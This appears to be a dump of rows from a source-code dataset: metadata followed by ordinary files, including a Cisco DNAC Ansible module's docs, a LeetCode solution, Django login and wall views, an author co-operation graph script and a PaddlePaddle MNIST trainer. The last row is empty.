name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
|
[
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce
|
a867b1c9da10a93136550c767c45e0d8c98f5675
|
/G_LC_1055_ShortestWaytoFormString.py
|
057fd0b488c0696e709603ccc3d5993c1b5d2c98
|
[] |
no_license
|
Omkar02/FAANG
|
f747aacc938bf747129b8ff35b6648fb265d95b6
|
ee9b245aa83ea58aa67954ab96442561dbe68d06
|
refs/heads/master
| 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 835 |
py
|
# import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
|
[
"[email protected]"
] | |
5cd51dcc05b75b2b754648bb03a96025a4d74590
|
d261119814862d1119ffa0a7bf64f2cfa956afac
|
/python_stack/django/django_full_stack/the_wall/apps/login_app/views.py
|
cc43e6d3148d0ae0f7cb82862d9a199126e16b7b
|
[] |
no_license
|
edwinreg011/Coding-Dojo
|
3280a2290dc4d8fb709c1ff4b4906b078925a705
|
14bb5844d741a2be05f995987a434f335c90e6c9
|
refs/heads/master
| 2022-12-24T14:23:20.342451 | 2019-12-17T19:24:54 | 2019-12-17T19:24:54 | 228,685,995 | 0 | 0 | null | 2022-12-11T17:34:49 | 2019-12-17T19:21:41 |
Python
|
UTF-8
|
Python
| false | false | 2,716 |
py
|
from django.shortcuts import render, HttpResponse, redirect
from .models import *
from django.contrib import messages
import bcrypt
def index(request):
    """Render the landing page with the registration/login forms."""
    return render(request, 'login_app/index.html')
def register(request):
    """Validate and create a new user, hashing the password with bcrypt.

    On validation failure, flashes each error and returns to the index;
    on success, stores the new user's id in the session.
    """
    if request.method == 'POST':
        errors = User.objects.user_validator(request.POST)
        if len(errors) > 0:
            for key, value in errors.items():
                messages.error(request, value)
            return redirect('/')
        else:
            hashed_password = bcrypt.hashpw(
                request.POST['password'].encode(), bcrypt.gensalt())
            new_user = User.objects.create(
                first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password=hashed_password)
            request.session['user_id'] = new_user.id
            return redirect('/users/success')
    return redirect('/')
def login(request):
    """Authenticate by email + bcrypt-checked password.

    The same generic error message is used for unknown email and wrong
    password so the form does not leak which accounts exist.
    """
    if request.method == 'POST':
        try:
            user = User.objects.get(email=request.POST['email'])
        except:
            # NOTE(review): bare except also hides non-lookup errors;
            # User.DoesNotExist would be the precise exception here.
            messages.error(request, 'Invalid username or password')
            return redirect('/')
        if bcrypt.checkpw(request.POST['password'].encode(), user.password.encode()):
            request.session['first_name'] = user.first_name
            request.session['user_id'] = user.id
            return redirect('/users/success')
        else:
            messages.error(request, 'Invalid username or password')
            return redirect('/')
    return redirect('/')
def success(request):
    """Wall page: current user plus all messages and comments."""
    if not check_login(request):
        return redirect('/')
    context = {
        'user': User.objects.get(id=request.session['user_id']),
        'post_data': Message.objects.all(),
        'comment_data': Comment.objects.all(),
    }
    return render(request, 'login_app/success.html', context)
def logout(request):
    """Drop the session's login keys and return to the index."""
    del request.session['user_id']
    del request.session['first_name']
    return redirect('/')
def check_login(request):
    """Return True when a user is logged in; flash a warning otherwise."""
    if not 'first_name' in request.session:
        messages.error(request, 'Log in to view this page')
        return False
    return True
# THE_WALL
def add_message(request):
    """Create a wall message authored by the session user."""
    Message.objects.create(message=request.POST['add_message'], user=User.objects.get(id=request.session['user_id']))
    return redirect('/users/success')
def add_comment(request):
    """Create a comment on the message named by the posted message_ID."""
    Comment.objects.create(comment = request.POST['add_comment'], user=User.objects.get(id=request.session['user_id']), message=Message.objects.get(id=request.POST['message_ID']))
    return redirect('/users/success')
def delete(request, id):
    """Delete the message with the given id.

    NOTE(review): no ownership check — any logged-in user appears able to
    delete any message; confirm whether that is intended.
    """
    m = Message.objects.get(id=id)
    m.delete()
    return redirect('/users/success')
|
[
"[email protected]"
] | |
88bd31ecc6bd237466ec96a185b1d943f4ead144
|
2d060eb9c7126b8963adcad857daa6e39c6ac75f
|
/Resist.py
|
12e4f998383248c49443c1a4b9fc74c578754390
|
[] |
no_license
|
easy-rpg/Filler
|
43ce36980156f4ffd9597d822e9fa6c19105d892
|
55cddbbb21ac508f64b98ceedbc30c680d4c4951
|
refs/heads/master
| 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 560 |
py
|
import abc
class Resist_Boa(object):
    """Abstract base holding the "good" resistance progression table.

    ``valores`` lists one value per level (20 entries, +2 up to +12).
    NOTE(review): ``__metaclass__`` is Python-2 syntax and is ignored by
    Python 3, so the abstract method is not actually enforced there —
    confirm the target interpreter.
    """
    __metaclass__ = abc.ABCMeta
    # Per-level progression values, index 0 = level 1.
    valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
    @abc.abstractmethod
    def __str__(self):
        raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
    """Abstract base holding the "poor" resistance progression table.

    Mirrors ``Resist_Boa`` but with the weaker 0..+6 progression.
    NOTE(review): as in ``Resist_Boa``, ``__metaclass__`` has no effect
    under Python 3.
    """
    __metaclass__ = abc.ABCMeta
    # Per-level progression values, index 0 = level 1.
    valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
    @abc.abstractmethod
    def __str__(self):
        raise NotImplementedError('users must define __str__ to use this base class')
|
[
"[email protected]"
] | |
8be0fa5c204f717833ba8ac10685a4af74ae08c8
|
37aeb840e5d13ff298e8a34e019e29cf30141bc6
|
/tests/test_model.py
|
dd0cfba9072f6fce82c694a9588dee50069f3acb
|
[
"MIT"
] |
permissive
|
mathildebadoual/mosaik-batterysim
|
d39cd401226e12bb6991fe07aa428ca251d77faa
|
5e37b419c3f8fd57cacc6975a5660c308cad31bd
|
refs/heads/master
| 2023-01-05T00:45:27.921255 | 2018-11-29T18:02:18 | 2018-11-29T18:02:18 | 136,089,746 | 1 | 2 |
MIT
| 2022-12-26T20:28:36 | 2018-06-04T22:28:38 |
Python
|
UTF-8
|
Python
| false | false | 1,016 |
py
|
from os.path import dirname, join
import arrow
import unittest
from batterysim.model import BatteryModel
data_file = join(dirname(__file__), 'data', 'test.data')
class TestHouseModel(unittest.TestCase):
    """Tests for ``batterysim.model.BatteryModel`` using the fixture at
    ``tests/data/test.data``."""
    def setUp(self):
        # Fresh model per test.
        # NOTE(review): the file handle from open() is never closed here.
        self.bm = BatteryModel(open(data_file), 'grid_test')
    def test_batterymodel_init(self):
        # Values below mirror the fixture's header fields.
        self.assertEqual(self.bm.start, arrow.get('2014-01-01'))
        self.assertEqual(self.bm.unit, 'W')
        self.assertEqual(self.bm.num_batteries, 3)
        # soc_init
        self.assertEqual(self.bm.batteries[2]['object'].charge, 0.5)
    def test_batterymodel_get(self):
        self.assertEqual(self.bm.get(10)[2], 0.5)
    def test_batterymodel_get_delta(self):
        # Two days + one hour after the start date -> 2940 minutes.
        date = '2014-01-03 01:00:00'
        delta = 2940
        minutes = self.bm.get_delta(date)
        self.assertEqual(minutes, delta)
    def test_batterymodel_get_delta_error(self):
        # Dates before the model's start must be rejected.
        self.assertRaises(ValueError,
                          lambda: self.bm.get_delta('2013-01-01 01:00:00'))
|
[
"[email protected]"
] | |
c502ce9cabce0dd8cc569f1883c2d6eb4df881fa
|
196054b50691861ef98cbcc66b5209235f488f5b
|
/fileupload/forms.py
|
e048ff31dc5895fc918a86f968d753a70910e4f3
|
[] |
no_license
|
rydauphin/DataDirector
|
9b41093b6da39472cc7f8bdeffdea017a87ac66e
|
612eab26f8f205e76e4086ab55ad5d7c89053ee0
|
refs/heads/master
| 2020-04-13T17:08:30.949088 | 2019-01-03T21:46:05 | 2019-01-03T21:46:05 | 163,339,913 | 1 | 1 | null | 2019-01-03T21:07:40 | 2018-12-27T22:06:48 |
Python
|
UTF-8
|
Python
| false | false | 166 |
py
|
from django import forms
from .models import FileUpload
class FileUploadForm(forms.ModelForm):
    """ModelForm exposing only the ``file`` field of ``FileUpload``."""
    class Meta:
        model = FileUpload
        fields = ('file',)
|
[
"[email protected]"
] | |
db605eaa64ddbafc35c69a599ae236c6fe638bdb
|
51999a7eaa33b82cac2a2c7212e546cc0420f8d7
|
/old_code/get_opcode_by_class.py
|
30841932679b2d11d2abd1316f808a4f8cfbc2f8
|
[] |
no_license
|
guptanitish/MicrosoftMalwareClassifcation
|
56efcf8bcacb3516966ac4bf0d731bb21c26128a
|
da1f5c22874d9f58df0ee61b0210ff5c9566e03d
|
refs/heads/master
| 2020-04-13T16:47:05.034358 | 2015-09-14T21:42:42 | 2015-09-14T21:42:42 | 32,280,391 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,322 |
py
|
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
#dictionary of opcodes per file
import pickle
import re
import os, os.path
import pandas as pd
import pickle
import sys
from sklearn.cross_validation import train_test_split
import io
'''
#returns a list
#searches for ' opcode ' from a specified list of opcodes
#needs:
output_path='/home/rishoo/Downloads/data/pickle/dict.txt' #where to store the output
label_csv_path='/home/rishoo/Downloads/data/trainLabels.csv' #path to csv file mapping filenames to labels
data_path = '/home/rishoo/Downloads/data/train_tiny_subset/' #path to the data
raw_opcode_list=['mov','add','sub'] #list of opcodes to filter
'''
output_path='/home/stufs1/nitigupta/512/results/dict_10percent.txt' #where to store the output
label_csv_path='/home/stufs1/nitigupta/512/data/trainLabels.csv' #path to csv file mapping filenames to labels
data_path = '/home/stufs1/nitigupta/512/data/train/' #path to the data
raw_opcode_list=['mov','add','sub','imul'] #list of opcodes to filter
# <codecell>
df_entire= pd.read_csv(label_csv_path)
a_train, a_test= train_test_split(df_entire,test_size=0.001, random_state=42)
df_test=pd.DataFrame.from_records(a_test)
# <codecell>
#build label dict - filename->labels
print("extracting labels..")
def get_labels(path,label_d,df):
    """Fill ``label_d`` with filename -> label pairs from ``df``'s rows.

    ``path`` is unused here; the caller already loaded the CSV into ``df``.
    """
    #df= pd.read_csv(path)
    for index, row in df.iterrows():
        # Column 0 is the sample filename, column 1 its class label.
        label_d[row[0]]=row[1]
label_d=dict()
get_labels(label_csv_path,label_d,df_test)
print("done extracting labels..")
# <codecell>
#making list of dict to store counts
opcode_dict_l=list()
for i in range(0,9):
opcode_dict=dict()
for item in raw_opcode_list:
formatted_opcode=' '+item+' '
opcode_dict[formatted_opcode]=0
opcode_dict_l.append(opcode_dict)
def count_opcodes(directory_path,filename):
    """Count tracked opcodes appearing in one .asm file.

    Counts accumulate into the module-global ``opcode_dict_l`` bucket for
    the file's class label (from global ``label_d``); nothing is returned.
    """
    #byte_limit=100
    try:
        path=directory_path+filename
        # latin-1 decodes any byte, avoiding errors on raw disassembly.
        openfile = io.open(path,'r',encoding='latin-1')
        #openfile = open(path,'rb')
        l_lines=openfile.readlines()
        count=0
        for line in l_lines:
            #match_text=re.search("text:",line)
            #if match_text:
            for opcode in opcode_dict.keys():
                #match_opcode=None
                match_opcode=re.search(opcode,line)
                if match_opcode:
                    #print (match.group())
                    # Strip '.asm' to recover the label-dict key.
                    filename_key= filename[:-4]
                    # Labels are 1-based; the bucket list is 0-based.
                    opcode_dict_l[label_d[filename_key]-1][opcode]+=1
                    # Only the first matching opcode per line is counted.
                    break
        openfile.close()
    except IOError:
        print ("Could not open file!")
        count=0
print("Begin...")
for filename in os.listdir(data_path):
if((filename[-4:])=='.asm'): #.swp files!
filename_key= filename[:-4]
if((label_d.get(filename_key,-1))!=-1):
label=label_d[filename_key]
print("Processing...\t",count,"\tlabel: ",label,"\t",filename,"\t")
sys.stdout.flush()
count_opcodes(data_path,filename)
count+=1
print("Done!")
# <codecell>
print("Pickling...")
dumpfile=open(output_path,'wb')
pickle.dump(opcode_dict_l,dumpfile)
dumpfile.close()
unpickled_file=open(output_path,'rb')
print("Done Pickling...")
unpickled_dict=pickle.load(unpickled_file)
unpickled_dict
# <codecell>
# <codecell>
|
[
"[email protected]"
] | |
e99a2ed03cfedf90fc2bdb91759de41cf60af1bc
|
db5308ba0417093282a353d8cd60089ca7cd974e
|
/Top-Interview-Questions/DynamicProgramming-Easy-Collection/121-best-time-to-buy-and-sell-stock.py
|
6e5ef13c4fc64e14467cd4e890a80759e9b4a65a
|
[] |
no_license
|
ssong86/leetcode-problem-solving
|
11a03abb20b6a9f62a29decd2a81b404710eed14
|
5ff31f31b8472373b54c9fd0e02e2be5e69a3dd3
|
refs/heads/master
| 2022-11-28T20:17:53.239044 | 2020-07-29T06:09:21 | 2020-07-29T06:09:21 | 259,515,217 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 481 |
py
|
class Solution:
    """Single-transaction stock profit (LeetCode 121)."""

    def maxProfit(self, prices: List[int]) -> int:
        """Return the best profit from one buy then one later sell.

        Single pass tracking the cheapest price seen so far and the best
        profit obtainable by selling at the current price.  O(n) time,
        O(1) space; returns 0 when no profitable trade exists.
        """
        cheapest = float('inf')
        best = 0
        for price in prices:
            profit = price - cheapest
            if profit > best:
                best = profit
            if price < cheapest:
                cheapest = price
        return best
# TC: O(n), n is the length of prices list
# SC: O(1)
# Runtime: 68 ms, faster than 51.98%
# Memory Usage: 15.1 MB, less than 74.89%
|
[
"[email protected]"
] | |
86d484c5ac99a387727ae07639d43a727abe014d
|
392f82f3af6ac5f886dfae0adfc9df27816027f8
|
/IData/IDataSearch/backdoor/analysis/SSRP_cooperation_analysis.py
|
3752690c60b8318e4a72b3cd914e11f2bdfcd711
|
[] |
no_license
|
Hitchcock717/SSRP-Dev
|
6914033b1af4a67c6f8fe44108ad522eadfaa82d
|
d6316fc3e99387c053415fd5e5421b122c41bb05
|
refs/heads/master
| 2023-02-06T12:22:11.826570 | 2020-06-10T01:24:27 | 2020-06-10T01:24:27 | 248,780,528 | 1 | 0 | null | 2023-01-26T15:03:47 | 2020-03-20T14:50:35 |
Python
|
UTF-8
|
Python
| false | false | 5,070 |
py
|
# -*- coding: utf-8 -*-
'''
SSRP分析平台之关系图分析 --- 作者两两合作
tips: 数据过载问题
'''
import itertools
from .SSRP_convert2num import *
class CooperateAnalysis(object):
def __init__(self):
# self.two_aus = ['王曜 陈舜胜', '郝勇 陈斌', '王洪荣 季昀', '周贤婧 师彦平', '王明智 杜建忠', '侯殿志 沈群', '张玉洁 付丽红', '凃璨 熊飞', '晓影 晓蓉', '李宗吉 赵巍', '邱澄宇 林杰曦', '申培博 韩秀珍', '李清 冶贵生', '何元丽 李国英', '李婷 翁武银', '石晶 陈荣冰', '石晶 陈荣冰', '臧学丽 陈光', '刘芊麟 陈亚楠', '刘芊麟 陈亚楠', '潘征 潘兴寿', '荣立洋 李毓秋', '潘振伟 侯宪云', '秦超燕 宁带连', '涂宽 崔鸿', '马娟 唐仕芳', '麦麦提艾力·阿卜杜纳斯尔 马纪', '廖晓峰 于荣', '郑贤金 汤斌', '杨旭 谢盈', '田顺立 郑春阳', '王洪 赵亚军', '周礼元 姜孝珣', '张丽琼 李博', '张金龙 蒋高喜', '徐澜 黄孟', '罗志祥 罗志忠', '佘宁 何伟先', '李伟龙 周晓肖', '肖永仁 杨连玉', '赵振东 王洁', '张树泽 吴国豪', '杨建芬 刘瑶', '小兵 植观', '祝远超 熊勇刚', '鲁佩玉 孙青华', '周芳 索化夷', '王姣 李宗孝', '闵建华 王浩', '闫文华 欧杰', '王清 陈舜胜', '马本贺 王海华', '张志浩 张继平', '成依依 周红宁', '王妍 令狐恩强', '黄嘉禾 贺平安', '王美迟 王贤纯', '苏艳玲 张谨华', '谢剑飞 杨欣卉', '黄啟亮 宋晓东', '田畅 王洋', '钱红 刘克明', '赵文鹏 黄国欣']
# self.more_aus = ['周冰心 傅勇 刘群 刘晶', '郝长波 张洁 谢建伟 王磊磊', '韩加敏 董霞 王小平 周昱恒', '麦麦提艾力·阿卜杜纳斯尔 李梦鸽 包静 随慧', '王晓岩 图力古尔 包海鹰', '陈丽花 朱楚楚 李冉冉', '何晓红 杨宏国 伍晓丽 刘飞 谢永芳 蒋龙星 王宇 冉玲芳', '程楠 项黛徽 沈雅园 付建新 张超', '施魁 唐燕妮 刘炀 管武太 陈芳 邓跃林', '王英明 徐亚欧 王志敏 徐珑洋 杨磊 林亚秋', '刘翠 潘健存 李媛媛 陈勇 蒋士龙', '王芳 乔璐 张庆庆 沈斌', '李景芳 王燕 陆东林', '农玉琴 李金婷 陈远权 陆金梅 廖春文 韦持章 韦锦坚', '王澍 冯力 李倩 杜鹃', '尹敬 任晓镤 钱烨 王震 彭增起 张雅玮', '刘中成 刘世芳 张苏 杨艳蕾 李飞 张楠 袁欣 张艳芬', '张勇 李弘文 曹晋良 南晓洁 杨丽', '金春爱 崔松焕 赵卉 嵩之松 王艳梅 刘畅 孙印石', '陈怡颖 丁奇 赵静 孙颖 张玉玉 孙宝国 郑福平', '郭丹 王晶 齐广海 张涛 高俊 张海军 武书庚', '周玉照 张小苗 赵天智 普星星 张以芳', '赵诗瑜 张帆 周晓龙 汪涵 赵阿勇 杨松柏']
self.search = SearchDictBuild()
def build_two_authors(self, two_aus):
two_aus_data = []
two_aus_list = [aus.split(' ') for aus in two_aus]
for au in two_aus_list:
aus_combi = list(itertools.combinations(au, 2))
two_aus_data.extend(aus_combi)
return two_aus_data
    def build_more_authors(self, more_aus):
        """Expand each space-separated multi-author string into all
        unordered author pairs (flat list of 2-tuples).

        NOTE(review): identical logic to ``build_two_authors``; the two
        could share one helper.
        """
        more_aus_data = []
        more_aus_list = [aus.split(' ') for aus in more_aus]
        for au in more_aus_list:
            aus_combi = list(itertools.combinations(au, 2))
            more_aus_data.extend(aus_combi)
        return more_aus_data
    def prepare_data(self, two_aus, more_aus):
        """Merge pair expansions of both inputs and drop pairs whose
        second author is empty."""
        data = []
        two_aus = self.build_two_authors(two_aus)
        more_aus = self.build_more_authors(more_aus)
        data.extend(two_aus)
        data.extend(more_aus)
        # Clean-up: drop pairings whose second author is the empty string.
        # NOTE(review): removing items from ``data`` while iterating it can
        # skip the element after each removal — confirm this is acceptable.
        for aus in data:
            aus_check = aus[1]
            if aus_check == '':
                data.remove(aus)
        # print(data)
        return data
    def build_au_id(self, two_aus, more_aus):
        """Build and return the author-name -> id mapping via the search
        helper (``self.search``): collect names from the cleaned pairs,
        de-duplicate, assign ids, and zip into a dict."""
        data = self.prepare_data(two_aus, more_aus)
        s_li = self.search.aus_build(data)
        aus_li = self.search.de_duplication(s_li)
        ids_li = self.search.ids_build(aus_li)
        au_id_dict = self.search.dict_build(aus_li, ids_li)
        return au_id_dict
    def build_au_relation(self, two_aus, more_aus):
        """Return (ids, relations) for the cooperation graph.

        ``relations`` is a list of {'from': id, 'to': id} edges (one per
        author pair); ``ids`` is a list of {'id': int, 'label': name}
        nodes.  Both are also printed for debugging.

        NOTE(review): ``build_au_id`` is recomputed twice per pair and
        again per node — O(n^2) rebuilds; caching the dict once before the
        loops would preserve behavior and be far cheaper.
        """
        relations = []
        for k in self.prepare_data(two_aus, more_aus):
            relation = {}
            p_au1, q_au2 = k[0], k[1]
            p = self.build_au_id(two_aus, more_aus).get(p_au1)
            q = self.build_au_id(two_aus, more_aus).get(q_au2)
            relation['from'] = str(p)
            relation['to'] = str(q)
            relations.append(relation)
        print(relations)
        ids = []
        for k,v in zip(list(self.build_au_id(two_aus, more_aus).keys()), list(self.build_au_id(two_aus, more_aus).values())):
            id = {}
            id['id'] = int(v)
            id['label'] = str(k)
            ids.append(id)
        print(ids)
        return ids, relations
if __name__ == '__main__':
cooper = CooperateAnalysis()
cooper.build_au_relation(two_aus, more_aus)
|
[
"[email protected]"
] | |
179cd7a1f65d62c1be568abe96d98561a937e2e9
|
d7f4ae811a22bb71eeef6132c3f2964336803d0d
|
/users/migrations/0002_auto_20190302_1232.py
|
7ef75bfb16a98159bedc5b30fcbf2dbb66820a26
|
[] |
no_license
|
antoncoding/grusse
|
305a2ee87cc246e0e65b78ad89797015675c124e
|
332daa7f3541d1bede5668fa7f83f081bc1b8eca
|
refs/heads/master
| 2021-03-13T04:11:09.578151 | 2020-08-04T05:06:48 | 2020-08-04T05:06:48 | 72,293,341 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,527 |
py
|
# Generated by Django 2.1.7 on 2019-03-02 12:32
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
    """Auto-generated migration: adds profile fields (birthday, city,
    friend/mail counters, country, gender, photo) to ``CustomUser``."""
    dependencies = [
        ('users', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='customuser',
            name='birthday',
            field=models.DateTimeField(blank=True, default='2000-01-01', null=True),
        ),
        migrations.AddField(
            model_name='customuser',
            name='city',
            field=models.CharField(blank=True, default='', max_length=100),
        ),
        migrations.AddField(
            model_name='customuser',
            name='count_friend',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='customuser',
            name='count_mail',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='customuser',
            name='country',
            field=django_countries.fields.CountryField(default='Taiwan', max_length=2),
        ),
        migrations.AddField(
            model_name='customuser',
            name='gender',
            field=models.CharField(choices=[('M', 'Male'), ('F', 'Female')], default='M', max_length=1),
        ),
        migrations.AddField(
            model_name='customuser',
            name='photo',
            field=models.ImageField(blank=True, null=True, upload_to='profilepic'),
        ),
    ]
|
[
"[email protected]"
] | |
e69f811f53141bb78526caedfde84012278ff07b
|
7bdb6ac5e4c9fc83b474e982df4f3a03a5281934
|
/tests/container_test.py
|
d30cad8ee3a5fc540b9ac200b994821d047a00fb
|
[] |
no_license
|
kochhar/pyrabj
|
47ddafbd15df5e717f4ae02815eef35a07ead8a8
|
f40c519eea92d7af093502e4397a8dcf23ec73ba
|
refs/heads/master
| 2016-09-06T12:54:03.564785 | 2012-02-15T23:10:02 | 2012-02-15T23:10:02 | 347,299 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 145 |
py
|
#!/usr/bin/env python
import rabj.simple as s
# Connect to the public RABJ service and inspect the first public queue.
srv = s.RabjServer('http://rabj.freebase.com')
pqs = srv.public_queues()
# NOTE(review): Python-2 print statement; this script predates Python 3.
print type(pqs[0].queue)
|
[
"[email protected]"
] | |
426b5255178ef4260436d7edc63a70a6bc93c9d6
|
b082fa207b5ac9db2f3529c46897312f886c18fb
|
/doc/edl/experiment/mnist/train_ft.py
|
09fe077654ac53bf32ae84434eb85d65c67dc3ca
|
[
"Apache-2.0"
] |
permissive
|
qizheng09/cloud
|
e129c42a6401d64e2d3e4d0cf65b4a6a5410069f
|
2a6aa526f2eec0d3e3aedca78d15bdc72b85bef9
|
refs/heads/develop
| 2021-05-14T10:08:58.885713 | 2018-03-02T06:26:31 | 2018-03-02T06:26:31 | 116,345,049 | 0 | 0 |
Apache-2.0
| 2018-02-13T11:42:51 | 2018-01-05T05:16:26 |
JavaScript
|
UTF-8
|
Python
| false | false | 4,593 |
py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PIL import Image
import numpy as np
import paddle.v2 as paddle
import paddle.v2.dataset.common as common
from paddle.v2.reader.creator import cloud_reader
import os
import sys
import glob
import pickle
DC = os.getenv("PADDLE_CLOUD_CURRENT_DATACENTER")
DATASET_PATH = "/data/mnist/mnist-train-*"
def softmax_regression(img):
    """One fully-connected softmax layer over the 784-pixel input:
    multinomial logistic regression to the 10 digit classes."""
    predict = paddle.layer.fc(input=img,
                              size=10,
                              act=paddle.activation.Softmax())
    return predict
def multilayer_perceptron(img):
    """Two ReLU hidden layers (128, 64) followed by a 10-way softmax."""
    # The first fully-connected layer
    hidden1 = paddle.layer.fc(input=img,
                              size=128,
                              act=paddle.activation.Relu())
    # The second fully-connected layer and the according activation function
    hidden2 = paddle.layer.fc(input=hidden1,
                              size=64,
                              act=paddle.activation.Relu())
    # The third fully-connected layer, note that the hidden size should be 10,
    # which is the number of unique digits
    predict = paddle.layer.fc(input=hidden2,
                              size=10,
                              act=paddle.activation.Softmax())
    return predict
def convolutional_neural_network(img):
    """LeNet-style CNN: two conv+pool stages then a 10-way softmax."""
    # first conv layer
    conv_pool_1 = paddle.networks.simple_img_conv_pool(
        input=img,
        filter_size=5,
        num_filters=20,
        num_channel=1,
        pool_size=2,
        pool_stride=2,
        act=paddle.activation.Relu())
    # second conv layer
    conv_pool_2 = paddle.networks.simple_img_conv_pool(
        input=conv_pool_1,
        filter_size=5,
        num_filters=50,
        num_channel=20,
        pool_size=2,
        pool_stride=2,
        act=paddle.activation.Relu())
    # fully-connected layer
    predict = paddle.layer.fc(input=conv_pool_2,
                              size=10,
                              act=paddle.activation.Softmax())
    return predict
def main():
    """Train MNIST on PaddlePaddle cloud: build the CNN, attach a
    momentum optimizer, and run a distributed SGD trainer whose parameter
    servers are discovered through etcd (ETCD_IP env var)."""
    etcd_ip = os.getenv("ETCD_IP")
    etcd_endpoint = "http://" + etcd_ip + ":" + "2379"
    paddle.init(trainer_count=1)
    # define network topology
    images = paddle.layer.data(
        name='pixel', type=paddle.data_type.dense_vector(784))
    label = paddle.layer.data(
        name='label', type=paddle.data_type.integer_value(10))
    # Here we can build the prediction network in different ways. Please
    # choose one by uncomment corresponding line.
    # predict = softmax_regression(images)
    # predict = multilayer_perceptron(images)
    predict = convolutional_neural_network(images)
    cost = paddle.layer.classification_cost(input=predict, label=label)
    parameters = paddle.parameters.create(cost)
    optimizer = paddle.optimizer.Momentum(
        learning_rate=0.1 / 128.0,
        momentum=0.9,
        regularization=paddle.optimizer.L2Regularization(rate=0.0005 * 128))
    trainer = paddle.trainer.SGD(cost=cost,
                                 parameters=parameters,
                                 update_equation=optimizer,
                                 is_local=False,
                                 pserver_spec=etcd_endpoint,
                                 use_etcd=True)
    def event_handler(event):
        # Log every 100th batch; evaluate on the test set after each pass.
        if isinstance(event, paddle.event.EndIteration):
            if event.batch_id % 100 == 0:
                print "Pass %d, Batch %d, Cost %f, %s" % (
                    event.pass_id, event.batch_id, event.cost, event.metrics)
        if isinstance(event, paddle.event.EndPass):
            result = trainer.test(reader=paddle.batch(
                paddle.dataset.mnist.test(), batch_size=2))
            print "Test with Pass %d, Cost %f, %s\n" % (
                event.pass_id, result.cost, result.metrics)
    trainer.train(
        reader=paddle.batch(
            cloud_reader([DATASET_PATH], etcd_endpoint), batch_size=10),
        event_handler=event_handler,
        num_passes=120)
if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/ui/station/fitting/stanceSlot.py
|
4f84e19f8e8023622408b00954931ab6ab6a422f
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,646 |
py
|
